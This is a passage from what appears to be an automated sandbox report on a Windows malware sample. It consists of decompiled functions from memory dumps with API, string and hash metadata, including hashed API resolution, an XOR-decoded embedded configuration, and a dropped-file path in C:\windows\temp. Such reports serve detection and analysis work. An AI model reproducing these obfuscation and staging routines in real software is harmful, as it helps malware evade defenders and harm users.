									_t106 =  *_t105( &_v1280, "30x");
									asm("sbb ebx, ebx");
									_t110 =  ~_t106 + 1;
								}
							}
							E00401B13(_t136);
						}
						E00401B13(_t133);
						_t134 = _v252;
					}
					E00401B13(_t134);
					return _t110;
				}
				_t107 = E004010BB(0, 6, 0x8593dc1);
				_t108 =  *_t107(_t131, 1, 0, 0, 0);
				_t134 = _t108;
				_v252 = _t108;
				if(_t134 == 0) {
					return _t108;
				}
				goto L2;
			}

0x0040704f
0x0040705b
0x00407065
0x0040706f
0x00407079
0x00407083
0x0040708d
0x00407097
0x004070a1
0x004070ab
0x004070b5
0x004070bf
0x004070c9
0x004070d3
0x004070dd
0x004070e7
0x004070f1
0x004070fb
0x00407105
0x0040710f
0x00407119
0x00407123
0x0040712d
0x00407137
0x00407141
0x0040714b
0x00407155
0x0040715f
0x00407169
0x00407170
0x00407177
0x0040717e
0x00407185
0x0040718c
0x00407193
0x0040719a
0x004071a1
0x004071a8
0x004071af
0x004071b6
0x004071bd
0x004071c3
0x004071c8
0x004071cf
0x004071d3
0x004071da
0x004071e3
0x004071e5
0x004071ed
0x00407215
0x0040721c
0x0040722f
0x00407231
0x00407239
0x0040724b
0x00407254
0x0040725c
0x00407263
0x0040726a
0x00407271
0x00407278
0x0040727f
0x00407286
0x0040728d
0x00407294
0x0040729e
0x004072a6
0x004072ad
0x004072b4
0x004072bb
0x004072c2
0x004072c9
0x004072d0
0x004072d7
0x004072de
0x004072e4
0x004072f2
0x0040730b
0x00407314
0x00407318
0x00407324
0x00407331
0x0040733d
0x00407343
0x0040734b
0x0040734c
0x0040734d
0x0040734e
0x0040734f
0x00407354
0x0040735d
0x0040736a
0x00407371
0x00407378
0x00407379
0x0040737b
0x00407380
0x00407389
0x00407392
0x004073a5
0x004073ab
0x004073ad
0x004073ad
0x00407380
0x004073af
0x004073b4
0x004073b6
0x004073bb
0x004073c1
0x004073c3
0x00000000
0x004073c9
0x004071f6
0x00407203
0x00407205
0x00407207
0x0040720f
0x004073d1
0x004073d1
0x00000000

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

wsprintfW.USER32 ref: 0040724B

Strings

hWA6, xrefs: 00407105
30x, xrefs: 00407399
x, xrefs: 00407389

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: LibraryLoadwsprintf
String ID: 30x$hWA6$x
API String ID: 2341783205-3369346571
Opcode ID: f2de2dca04df7ecc2f3180fb65e6b20af6fabe2808c6a566004ed816861f7096
Instruction ID: c01fd6390c40e236e4064484472f1d991958f7ed7b543cf0cb08a7f1b7626d3a
Opcode Fuzzy Hash: f2de2dca04df7ecc2f3180fb65e6b20af6fabe2808c6a566004ed816861f7096
Instruction Fuzzy Hash: F9914DB1D0432DAEEB249F918D81BEEBB78EB00344F104199E5587B280EB745E85CF66

Uniqueness

Uniqueness Score: 100.00%

Function 00422823, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124
UNIQUE

Download Yara Rule

C-Code - Quality: 91%

			E00422823(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E0042D1FF(_t48, _t57);
						E0042947D(_t57, 0, 0x44dd48, 0x104);
						_t26 =  *0x44e2a0; // 0x263370
						 *0x44e290 = 0x44dd48;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x44dd48;
							_v20 = 0x44dd48;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E00422AD4(E0042295B( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E0042295B( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E0042CCE4(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x44e294 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x44e298 = _t58;
											L18:
											E004214E2(_t37);
											_v12 = 0;
											L19:
											E004214E2(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x44e294 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x44e298 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E0041A8EF(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E0041A8EF(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E0041A815();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x00422823
0x0042282c
0x00422831
0x0042283b
0x0042283e
0x0042285b
0x0042285c
0x0042286f
0x00422874
0x0042287c
0x00422882
0x00422885
0x00422887
0x0042288e
0x0042288e
0x00422890
0x00422893
0x00422896
0x0042289d
0x004228b6
0x004228bb
0x004228bd
0x004228de
0x004228e6
0x004228e9
0x00422904
0x00422907
0x0042290e
0x00422912
0x00422914
0x0042291b
0x0042291e
0x00422920
0x00422922
0x00422924
0x0042292e
0x0042292e
0x00422930
0x00422936
0x00422939
0x0042293b
0x00422941
0x00422942
0x00422948
0x0042294b
0x0042294c
0x00422952
0x00422955
0x00000000
0x00000000
0x00000000
0x00000000
0x00422926
0x00422926
0x00422926
0x00422929
0x0042292a
0x0042292a
0x00000000
0x00422926
0x00422916
0x00000000
0x00422916
0x004228ee
0x004228ee
0x004228ef
0x004228f4
0x004228f6
0x004228f8
0x004228fd
0x004228fd
0x00000000
0x004228fd
0x004228bf
0x004228c4
0x004228c6
0x004228c7
0x00000000
0x004228c7
0x00422889
0x0042288c
0x00000000
0x00000000
0x00000000
0x0042288c
0x00422840
0x00422843
0x00000000
0x00000000
0x00422845
0x0042284c
0x0042284d
0x0042284f
0x00422854
0x00000000
0x00422854
0x00000000

APIs

Part of subcall function 0042947D: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004294A2
Part of subcall function 0042947D: GetLastError.KERNEL32 ref: 004294AC
Part of subcall function 0042947D: __dosmaperr.LIBCMT ref: 004294B3

Part of subcall function 00422AD4: _free.LIBCMT ref: 00422B12

_free.LIBCMT ref: 00422942

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

_free.LIBCMT ref: 0042294C

Strings

C:\windows\temp\229.exe, xrefs: 00422866, 004228A3
p3&, xrefs: 00422874

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$ErrorLast$FileFreeHeapModuleName__dosmaperr
String ID: C:\windows\temp\229.exe$p3&
API String ID: 3932426674-3074984001
Opcode ID: f2d7d0d8c10a35aed32be417e7d2eefa82a4f3eb086d18b90558b649d84e7f60
Instruction ID: 00981de04c79bce31e767c53e95b0c8d05a825fe18df141c1341de175097d20a
Opcode Fuzzy Hash: f2d7d0d8c10a35aed32be417e7d2eefa82a4f3eb086d18b90558b649d84e7f60
Instruction Fuzzy Hash: 854193B1F00229BBDB25EF9AA98199EBBA8FB85310F50016BE504A7211D6B48E41C759

Uniqueness

Uniqueness Score: 100.00%

Function 00422823, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124UNIQUE

Download Yara Rule

APIs

Part of subcall function 0042947D: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004294A2
Part of subcall function 0042947D: GetLastError.KERNEL32 ref: 004294AC

Part of subcall function 00422AD4: _free.LIBCMT ref: 00422B12

_free.LIBCMT ref: 00422942

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

_free.LIBCMT ref: 0042294C

Strings

C:\windows\temp\229.exe, xrefs: 00422866, 004228A3
p3&, xrefs: 00422874

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: _free$ErrorLast$FileFreeHeapModuleName
String ID: C:\windows\temp\229.exe$p3&
API String ID: 2896464430-3074984001
Opcode ID: e90fc076f75c0b285234968ae809f4c5a72c754f69b523cde4b0ea8ee69b7d51
Instruction ID: 00981de04c79bce31e767c53e95b0c8d05a825fe18df141c1341de175097d20a
Opcode Fuzzy Hash: e90fc076f75c0b285234968ae809f4c5a72c754f69b523cde4b0ea8ee69b7d51
Instruction Fuzzy Hash: 854193B1F00229BBDB25EF9AA98199EBBA8FB85310F50016BE504A7211D6B48E41C759

Uniqueness

Uniqueness Score: 100.00%

Function 00406C84, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91
threadUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E00406C84() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v52;
				char _v56;
				char _v568;
				short _v2616;
				signed int _t34;
				WCHAR* _t44;
				void* _t53;
				void* _t54;
				long _t57;
				signed int _t60;
				short* _t61;
				void* _t63;
				void* _t64;
				void* _t67;

				_v56 =  *((intOrPtr*)(E004010BB(_t53, 1, 0x69260152)))();
				_t61 = 0x414e50;
				E00407581(0x414e40, 0x10, 0x414e50, 0x1106);
				_t64 = _t63 + 0x10;
				_t57 = 0;
				_t34 = 0;
				do {
					 *(_t34 + 0x414e50) =  *(_t34 + 0x414e50) ^ 0x00000005;
					_t34 = _t34 + 1;
				} while (_t34 < 0x1106);
				_t60 = 0;
				_v52 = 0;
				_t67 =  *0x414e50 - _t57; // 0x4b99
				if(_t67 == 0) {
					L7:
					ExitThread(_t57);
				}
				_t54 = 2;
				do {
					_t68 =  *_t61 - 0x3b;
					if( *_t61 == 0x3b) {
						E0040C70B( &_v568, _t57, 0x200);
						E004073EF( &_v568, 0x414e50 + _v52 * 2, _t60 - _v52);
						_t10 = _t60 + 1; // 0x1
						_v48 = 0xc5218a93;
						_v52 = _t10;
						_v44 = 0xd3ecbcf0;
						_v40 = 0x80eb2a88;
						_v36 = 0xc5c2aabc;
						_v32 = 0xee4e2160;
						_v28 = 0xee4e2174;
						_v24 = 0x50f85a93;
						_v20 = 0xfdf1f1de;
						_v16 = 0xa9ae17f8;
						_v12 = 0x58ae1385;
						_v8 = 0x57ac2cdd;
						_t44 = E00407563( &_v48);
						E0040C70B( &_v2616, 0, 0x800);
						wsprintfW( &_v2616, _t44,  &_v568);
						E00405CC1(_t68,  &_v56,  &_v2616);
						_t64 = _t64 + 0x3c;
						_t57 = 0;
					}
					_t60 = _t60 + 1;
					_t54 = _t54 + 2;
					_t61 = 0x414e50 + _t60 * 2;
				} while ( *_t61 != _t57);
				goto L7;
			}

0x00406ca5
0x00406ca9
0x00406cb6
0x00406cbb
0x00406cbe
0x00406cc0
0x00406cc2
0x00406cc2
0x00406cc9
0x00406cca
0x00406cce
0x00406cd0
0x00406cd3
0x00406cda
0x00406dca
0x00406dcb
0x00406dcb
0x00406ce2
0x00406ce3
0x00406ce3
0x00406ce7
0x00406cfa
0x00406d16
0x00406d1b
0x00406d1e
0x00406d25
0x00406d2c
0x00406d33
0x00406d3a
0x00406d41
0x00406d48
0x00406d4f
0x00406d56
0x00406d5d
0x00406d64
0x00406d6b
0x00406d72
0x00406d87
0x00406d9b
0x00406dac
0x00406db1
0x00406db4
0x00406db4
0x00406db6
0x00406db7
0x00406dba
0x00406dc1
0x00000000

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

wsprintfW.USER32 ref: 00406D9B

Part of subcall function 00405CC1: wsprintfW.USER32 ref: 00405DC3

ExitThread.KERNEL32 ref: 00406DCB

Strings

t!N, xrefs: 00406D48
`!N, xrefs: 00406D41

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: wsprintf$ExitLibraryLoadThread
String ID: `!N$t!N
API String ID: 3413620369-1123168861
Opcode ID: d3fc9b2b61fd3e36e78e45b0c9bdd738c70f2c15480c6241a730ee3d585a7049
Instruction ID: 6c067bd534cb872f7d9ee0a721a82b1e98756edc7e7a2383bdbda5eb2e22faa7
Opcode Fuzzy Hash: d3fc9b2b61fd3e36e78e45b0c9bdd738c70f2c15480c6241a730ee3d585a7049
Instruction Fuzzy Hash: 43316DB1D00319ABDB10EFA0DC45ACEBB79EB05700F10456AF515BB281E778AB40CB98

Uniqueness

Uniqueness Score: 100.00%

Function 004010C0, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 22
UNIQUE

Download Yara Rule

C-Code - Quality: 90%

			E004010C0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t3;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;
				intOrPtr* _t14;
				void* _t16;

				_t11 = __esi;
				_t10 = __edi;
				_t9 = __edx;
				_t6 = __ebx;
				 *0x44c7a0 = E00413DB8();
				 *0x44c794 = E00403960(__ebx, __edx, _t10, _t12, 0x44c79c, 1);
				_t3 = E00403A70(__ebx, __edx, _t10, _t12, 0x44c79c, __ecx);
				_t14 = _t13 + 0xc;
				 *_t14 = 0;
				 *0x44c798 = _t3;
				_push( *_t14);
				E00402F10(_t6, 0x44c790, _t9, _t10, _t11, _t12, _t16, "^\\s*(?:r|remove)\\s*(\\w+)\\s*->\\s*(\\w+)\\s*$", 0x437649, 0x500);
				return E004152AA(_t16, E00436010);
			}

0x004010c0
0x004010c0
0x004010c0
0x004010c0
0x004010cd
0x004010dc
0x004010e1
0x004010e6
0x004010e9
0x004010f2
0x004010f7
0x00401109
0x0040111b

APIs

std::locale::_Init.LIBCPMT ref: 004010C3

Part of subcall function 00413DB8: std::_Lockit::_Lockit.LIBCPMT ref: 00413DCA
Part of subcall function 00413DB8: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00413DDD
Part of subcall function 00413DB8: std::locale::_Setgloballocale.LIBCPMT ref: 00413DE5
Part of subcall function 00413DB8: _Yarn.LIBCPMT ref: 00413DFB
Part of subcall function 00413DB8: std::_Lockit::~_Lockit.LIBCPMT ref: 00413E39

Part of subcall function 00403960: std::_Lockit::_Lockit.LIBCPMT ref: 0040396D
Part of subcall function 00403960: std::_Lockit::_Lockit.LIBCPMT ref: 0040398B
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 004039AC
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 004039F5
Part of subcall function 00403960: std::_Facet_Register.LIBCPMT ref: 00403A29
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 00403A35
Part of subcall function 00403960: __CxxThrowException@8.LIBVCRUNTIME ref: 00403A67

Part of subcall function 00403A70: std::_Lockit::_Lockit.LIBCPMT ref: 00403A7D
Part of subcall function 00403A70: std::_Lockit::_Lockit.LIBCPMT ref: 00403A9B
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403ABC
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403B05
Part of subcall function 00403A70: std::_Facet_Register.LIBCPMT ref: 00403B39
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403B45
Part of subcall function 00403A70: __CxxThrowException@8.LIBVCRUNTIME ref: 00403B77

Part of subcall function 004152AA: __onexit.LIBCMT ref: 004152B0

Strings

^\s*(?:r|remove)\s*(\w+)\s*->\s*(\w+)\s*$, xrefs: 00401104
p`), xrefs: 004010ED
`7), xrefs: 004010CD

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$std::locale::_$Exception@8Facet_RegisterThrow$InitLocimpLocimp::_New_SetgloballocaleYarn__onexit
String ID: ^\s*(?:r|remove)\s*(\w+)\s*->\s*(\w+)\s*$$`7)$p`)
API String ID: 3878167811-3194234781
Opcode ID: 31bd9f8925d897b8ff795141a40e53477eb131b01ef9478ad96e4a9d100fd072
Instruction ID: ad6d947f0f9ccaed85bbfac2a518e64270aede47ed5041353fceefec5a171995
Opcode Fuzzy Hash: 31bd9f8925d897b8ff795141a40e53477eb131b01ef9478ad96e4a9d100fd072
Instruction Fuzzy Hash: FFE01AB8A8A7026BFA807B616C83B593A909B55B15F68183FB484652C2EBFD01404E5E

Uniqueness

Uniqueness Score: 100.00%

Function 004011E0, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 22
UNIQUE

Download Yara Rule

C-Code - Quality: 90%

			E004011E0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t3;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;
				intOrPtr* _t14;
				void* _t16;

				_t11 = __esi;
				_t10 = __edi;
				_t9 = __edx;
				_t6 = __ebx;
				 *0x44c7dc = E00413DB8();
				 *0x44c7d0 = E00403960(__ebx, __edx, _t10, _t12, 0x44c7d8, 1);
				_t3 = E00403A70(__ebx, __edx, _t10, _t12, 0x44c7d8, __ecx);
				_t14 = _t13 + 0xc;
				 *_t14 = 0;
				 *0x44c7d4 = _t3;
				_push( *_t14);
				E00402F10(_t6, 0x44c7cc, _t9, _t10, _t11, _t12, _t16, "^\\s*(?:v|vx|vertex)\\s*(\\w+)\\s*$", 0x4375f7, 0x500);
				return E004152AA(_t16, E00436100);
			}

0x004011e0
0x004011e0
0x004011e0
0x004011e0
0x004011ed
0x004011fc
0x00401201
0x00401206
0x00401209
0x00401212
0x00401217
0x00401229
0x0040123b

APIs

std::locale::_Init.LIBCPMT ref: 004011E3

Part of subcall function 00413DB8: std::_Lockit::_Lockit.LIBCPMT ref: 00413DCA
Part of subcall function 00413DB8: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00413DDD
Part of subcall function 00413DB8: std::locale::_Setgloballocale.LIBCPMT ref: 00413DE5
Part of subcall function 00413DB8: _Yarn.LIBCPMT ref: 00413DFB
Part of subcall function 00413DB8: std::_Lockit::~_Lockit.LIBCPMT ref: 00413E39

Part of subcall function 00403960: std::_Lockit::_Lockit.LIBCPMT ref: 0040396D
Part of subcall function 00403960: std::_Lockit::_Lockit.LIBCPMT ref: 0040398B
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 004039AC
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 004039F5
Part of subcall function 00403960: std::_Facet_Register.LIBCPMT ref: 00403A29
Part of subcall function 00403960: std::_Lockit::~_Lockit.LIBCPMT ref: 00403A35
Part of subcall function 00403960: __CxxThrowException@8.LIBVCRUNTIME ref: 00403A67

Part of subcall function 00403A70: std::_Lockit::_Lockit.LIBCPMT ref: 00403A7D
Part of subcall function 00403A70: std::_Lockit::_Lockit.LIBCPMT ref: 00403A9B
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403ABC
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403B05
Part of subcall function 00403A70: std::_Facet_Register.LIBCPMT ref: 00403B39
Part of subcall function 00403A70: std::_Lockit::~_Lockit.LIBCPMT ref: 00403B45
Part of subcall function 00403A70: __CxxThrowException@8.LIBVCRUNTIME ref: 00403B77

Part of subcall function 004152AA: __onexit.LIBCMT ref: 004152B0

Strings

^\s*(?:v|vx|vertex)\s*(\w+)\s*$, xrefs: 00401224
`7), xrefs: 004011ED
8G), xrefs: 0040120D

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$std::locale::_$Exception@8Facet_RegisterThrow$InitLocimpLocimp::_New_SetgloballocaleYarn__onexit
String ID: 8G)$^\s*(?:v|vx|vertex)\s*(\w+)\s*$$`7)
API String ID: 3878167811-1432378483
Opcode ID: e10a93b09b1f5806e90c242586fe53e2865eea683ab029d5c6593129002c995a
Instruction ID: cf39955c213428f3e17304471e156758d84c8d118ea25219acbfd8e420affe2c
Opcode Fuzzy Hash: e10a93b09b1f5806e90c242586fe53e2865eea683ab029d5c6593129002c995a
Instruction Fuzzy Hash: 8FE0D8B8AC53027BE7403B716C43B2839419B41B05F98143FB080359C2EBFD01004F5D

Uniqueness

Uniqueness Score: 100.00%

Function 0042856F, Relevance: 6.3, APIs: 4, Instructions: 321
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0042856F(void* __edx, void* __fp0, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t119;
				signed int* _t120;
				void* _t123;
				signed int _t125;
				signed int _t131;
				signed int* _t132;
				signed int* _t135;
				signed int _t136;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t148;
				signed int _t149;
				signed int _t153;
				signed int _t154;
				void* _t158;
				unsigned int _t159;
				signed int _t166;
				void* _t167;
				signed int _t168;
				signed int* _t169;
				signed int _t172;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t195;

				_t195 = __fp0;
				_t167 = __edx;
				_t180 = _a24;
				if(_t180 < 0) {
					_t180 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E0041B23E( &_v60, _t167, _a36);
				_t5 = _t180 + 0xb; // 0xb
				_t192 = _a12 - _t5;
				if(_a12 > _t5) {
					_t135 = _a4;
					_t141 = _t135[1];
					_t168 =  *_t135;
					__eflags = (_t141 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t141 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t141;
						if(__eflags > 0) {
							L14:
							_t17 = _t184 + 1; // 0x41e48b
							_t169 = _t17;
							_t85 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t85;
							_v40 = _t169;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t141 & 0x7ff00000;
							_t91 = 0x30;
							if((_t141 & 0x7ff00000) != 0) {
								 *_t184 = 0x31;
								L19:
								_t143 = 0;
								__eflags = 0;
								L20:
								_t25 =  &(_t169[0]); // 0x41e48b
								_t185 = _t25;
								_v16 = _t185;
								__eflags = _t180;
								if(_t180 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t143;
								}
								 *_t169 = _t95;
								_t97 = _t135[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t170 = _t143;
									_t144 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v16 = _t143;
									_v24 = 0xf0000;
									do {
										__eflags = _t180;
										if(_t180 <= 0) {
											break;
										}
										_t123 = E004356F0( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
										_t158 = 0x30;
										_t125 = _t123 + _t158 & 0x0000ffff;
										__eflags = _t125 - 0x39;
										if(_t125 > 0x39) {
											_t125 = _t125 + _v32;
											__eflags = _t125;
										}
										_t159 = _v24;
										_t170 = (_t159 << 0x00000020 | _v16) >> 4;
										 *_t185 = _t125;
										_t185 = _t185 + 1;
										_t144 = _t159 >> 4;
										_t98 = _v12 - 4;
										_t180 = _t180 - 1;
										_v16 = (_t159 << 0x00000020 | _v16) >> 4;
										_v24 = _t159 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v16 = _t185;
									__eflags = _t98;
									if(_t98 < 0) {
										goto L42;
									}
									_t119 = E004356F0( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
									__eflags = _t119 - 8;
									if(_t119 <= 8) {
										goto L42;
									}
									_t50 = _t185 - 1; // 0x41e48b
									_t120 = _t50;
									_t139 = 0x30;
									while(1) {
										_t153 =  *_t120;
										__eflags = _t153 - 0x66;
										if(_t153 == 0x66) {
											goto L35;
										}
										__eflags = _t153 - 0x46;
										if(_t153 != 0x46) {
											_t135 = _a4;
											__eflags = _t120 - _v40;
											if(_t120 == _v40) {
												_t54 = _t120 - 1;
												 *_t54 =  *(_t120 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t153 - 0x39;
												if(_t153 != 0x39) {
													_t154 = _t153 + 1;
													__eflags = _t154;
												} else {
													_t154 = _v32 + 0x3a;
												}
												 *_t120 = _t154;
											}
											goto L42;
										}
										L35:
										 *_t120 = _t139;
										_t120 = _t120 - 1;
									}
								} else {
									__eflags =  *_t135 - _t143;
									if( *_t135 <= _t143) {
										L42:
										__eflags = _t180;
										if(_t180 > 0) {
											_push(_t180);
											_t115 = 0x30;
											_push(_t115);
											_push(_t185);
											E00417660(_t180);
											_t185 = _t185 + _t180;
											__eflags = _t185;
											_v16 = _t185;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t185 = _t99;
											_v16 = _t185;
										}
										 *_t185 = (_v5 << 5) + 0x50;
										_t104 = E004356F0( *_t135, 0x34, _t135[1]);
										_t186 = 0;
										_t105 = _v16;
										_t148 = (_t104 & 0x000007ff) - _v20;
										__eflags = _t148;
										asm("sbb esi, esi");
										_t63 = _t105 + 2; // 0x41e48b
										_t172 = _t63;
										_v40 = _t172;
										if(__eflags < 0) {
											L50:
											_t148 =  ~_t148;
											asm("adc esi, 0x0");
											_t186 =  ~_t186;
											_t136 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t136 = 0x2b;
												L51:
												 *(_t105 + 1) = _t136;
												_t181 = _t172;
												_t106 = 0x30;
												 *_t172 = _t106;
												_t107 = 0;
												__eflags = _t186;
												if(__eflags < 0) {
													L55:
													__eflags = _t181 - _t172;
													if(_t181 != _t172) {
														L59:
														_push(_t136);
														_push(_t107);
														_push(0x64);
														_push(_t186);
														_t108 = E004357C0();
														_t186 = _t136;
														_t136 = _t148;
														_v32 = _t172;
														_t172 = _v40;
														 *_t181 = _t108 + 0x30;
														_t181 = _t181 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
